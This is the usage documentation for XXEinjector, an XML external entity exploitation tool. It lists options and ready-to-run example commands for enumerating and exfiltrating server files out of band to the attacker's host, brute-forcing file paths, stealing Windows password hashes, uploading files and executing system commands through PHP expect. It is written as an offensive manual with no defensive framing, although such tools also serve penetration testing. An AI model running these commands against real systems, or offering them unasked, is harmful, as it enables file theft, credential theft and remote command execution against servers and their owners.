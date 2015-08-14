XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.

Options:

--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2) --file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt) --path Mandatory if enumerating directories - Path to enumerate. (--path=/etc) --brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt) --logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results. --rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3) --rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080) --oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher) --direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK) --cdata Improve direct exploitation with CDATA. Data is retrieved directly, however OOB is used to construct CDATA payload. Specify --cdata-xml to see how request should look like in this technique. --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) --phpfilter Use PHP filter to base64 encode target file before sending. --netdoc Use netdoc protocol instead of file (Java). --enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445) --hashes Steals Windows hash of the user that runs an application. --expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls) --upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt) --xslt Tests for XSLT injection. --ssl Use SSL. --proxy Proxy to use. (--proxy=127.0.0.1:8080) --httpport Set custom HTTP port. (--httpport=80) --ftpport Set custom FTP port. (--ftpport=21) --gopherport Set custom gopher port. (--gopherport=70) --jarport Set custom port for uploading files using jar. (--jarport=1337) --xsltport Set custom port for XSLT injection test. (--xsltport=1337) --test This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server. --urlencode URL encode injected DTD. This is default for URI. --nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like. --output Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt) --timeout Timeout for receiving file/directory content. (--timeout=20) --contimeout Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20) --fast Skip asking what to enumerate. Prone to false-positives. --verbose Show verbose messages.

Example Usage:

Enumerating /etc directory in HTTPS application: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl Enumerating /etc directory using gopher for OOB method: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher Second order exploitation: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt Bruteforcing files using HTTP out of band method and netdoc protocol: ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc Enumerating using direct exploitation: ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK Enumerating unfiltered ports: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all Stealing Windows hashes: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes Uploading files using Java jar: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf Executing system commands using PHP expect: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls Testing for XSLT injection: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt Log requests only: ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt